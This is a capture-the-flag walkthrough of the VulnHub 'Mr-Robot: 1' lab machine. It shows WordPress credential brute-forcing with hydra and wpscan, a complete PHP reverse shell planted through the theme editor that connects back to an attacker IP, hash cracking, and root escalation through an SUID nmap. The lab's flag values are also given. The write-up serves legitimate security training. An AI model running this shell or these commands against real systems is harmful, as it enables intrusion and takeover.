Target drone address: Mr-Robot: 1 ~ VulnHub
Penetration process:
Let’s look at the description first. There are 3 keys in this drone.
First determine the IP address of the target machine and detect the open ports of the target machine.
After accessing the address of the drone, a very cool web interface appears. This mr.robot is an American TV series and is quite interesting.
There is no other information. I blasted the directory and found the /admin directory, robots.txt, and WordPress related directories.
When you access robots.txt, a keys and a dictionary file appear. When you access this dictionary file, it will be downloaded.
Download keys to local
View the first keys
key-1-of-3.txt
073403c8a58a1f80d943455fb30724b9
Use nikto to scan web pages to see if there are vulnerabilities
If nothing is scanned out, then go directly to the wp login box, enter whatever you want, try to log in first, and find that it will determine the user name, then you can use the dictionary to blast the user name first!
Grab a bag and see how it's constructed!
hydra -L fsocity.dic -p xiaoli 192.168.56.129 http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=Invalid username"
Here we use hydra's http-post-form form to blast the username. Enter the password casually. First confirm 
that the username is Elliot, the name of the protagonist, and then use this dictionary to blast the password. Because this dictionary is too large. Yes, the blasting time is too long. Let’s simplify it and remove all the redundant ones.
cat fsocity.dic| sort -u | uniq >wordlist.dic
Then use wpscan to blast
wpscan --url http://192.168.56.129/wp-login/ -U Elliot -P wordlist.dic
Explode and get Elliot's password which is ER28-0652
Log in to the backend and search
I'm tired of reading English, so change it to Chinese!
There is an editor here in the appearance, which contains the files of the website. Write a shell directly in these files. If you are too lazy to write, just use the one that comes with kali. Just remember to change the IP and port to your own! Then update the file and access it in the url and it will be OK!
kali shell
<?php
set_time_limit (0);
$VERSION = "1.0";
$ip = '192.168.56.104'; // CHANGE THIS
$port = 1234; // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;
//
// Daemonise ourself if possible to avoid zombies later
//
// pcntl_fork is hardly ever available, but will allow us to daemonise
// our php process and avoid zombies. Worth a try...
if (function_exists('pcntl_fork')) {
// Fork and have the parent process exit
$pid = pcntl_fork();
if ($pid == -1) {
printit("ERROR: Can't fork");
exit(1);
}
if ($pid) {
exit(0); // Parent exits
}
// Make the current process a session leader
// Will only succeed if we forked
if (posix_setsid() == -1) {
printit("Error: Can't setsid()");
exit(1);
}
$daemon = 1;
} else {
printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
}
// Change to a safe directory
chdir("/");
// Remove any umask we inherited
umask(0);
//
// Do the reverse shell...
//
// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
printit("$errstr ($errno)");
exit(1);
}
// Spawn shell process
$descriptorspec = array(
0 => array("pipe", "r"), // stdin is a pipe that the child will read from
1 => array("pipe", "w"), // stdout is a pipe that the child will write to
2 => array("pipe", "w") // stderr is a pipe that the child will write to
);
$process = proc_open($shell, $descriptorspec, $pipes);
if (!is_resource($process)) {
printit("ERROR: Can't spawn shell");
exit(1);
}
// Set everything to non-blocking
// Reason: Occsionally reads will block, even though stream_select tells us they won't
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);
printit("Successfully opened reverse shell to $ip:$port");
while (1) {
// Check for end of TCP connection
if (feof($sock)) {
printit("ERROR: Shell connection terminated");
break;
}
// Check for end of STDOUT
if (feof($pipes[1])) {
printit("ERROR: Shell process terminated");
break;
}
// Wait until a command is end down $sock, or some
// command output is available on STDOUT or STDERR
$read_a = array($sock, $pipes[1], $pipes[2]);
$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
// If we can read from the TCP socket, send
// data to process's STDIN
if (in_array($sock, $read_a)) {
if ($debug) printit("SOCK READ");
$input = fread($sock, $chunk_size);
if ($debug) printit("SOCK: $input");
fwrite($pipes[0], $input);
}
// If we can read from the process's STDOUT
// send data down tcp connection
if (in_array($pipes[1], $read_a)) {
if ($debug) printit("STDOUT READ");
$input = fread($pipes[1], $chunk_size);
if ($debug) printit("STDOUT: $input");
fwrite($sock, $input);
}
// If we can read from the process's STDERR
// send data down tcp connection
if (in_array($pipes[2], $read_a)) {
if ($debug) printit("STDERR READ");
$input = fread($pipes[2], $chunk_size);
if ($debug) printit("STDERR: $input");
fwrite($sock, $input);
}
}
fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);
// Like print, but does nothing if we've daemonised ourself
// (I can't figure out how to redirect STDOUT like a proper daemon)
function printit ($string) {
if (!$daemon) {
print "$string\n";
}
}
?>
Change the ip to your kali’s ip, and change the port as you like.
Oak! I bounced the shell and found the second key in the /home/robot folder. Hey, it still doesn’t let me access it. The permissions are not enough! Then I put an md5 password next to it. Really, I need to do it again.
I gave the robot the md5 encrypted password and just cracked it.
This password is a big thumbs up! What a show!
Switch robot, visit again, and get the second key.
key-2-of-3.txt
822c73956184f694993bede3eb39f959
The last one, then you have to escalate the rights. It’s still the same. Check if there is a suid file and find nmap!
Take a look at nmap, which parameter to use?
There is an interactive one at the bottom, enter during this interaction! sh, doesn’t this return to a root shell?
Accidentally, the privilege escalation was successful and I got the third key.
key-3-of-3.txt
04787ddef27c3dee1ee161b21670b4e4
This penetration is over!
Summarize:
Finally, let’s summarize the ideas for this penetration:
1. Determine the target IP and open port detection
2. Access web services and collect useful information
3. If there is no useful information, perform directory blasting, collect useful information, find the background, obtain sensitive files, and find the first keys.
4. Use sensitive files to determine the logged-in username and crack the username and password.
5. Use blasted usernames and passwords to enter the backend and look for exploitable weaknesses.
6. Find an editor that modifies the file, write the file, access it, and rebound the shell
7. After obtaining the shell, collect server information and obtain the second keys.
8. Elevate privileges to obtain the final keys
9. Clean up traces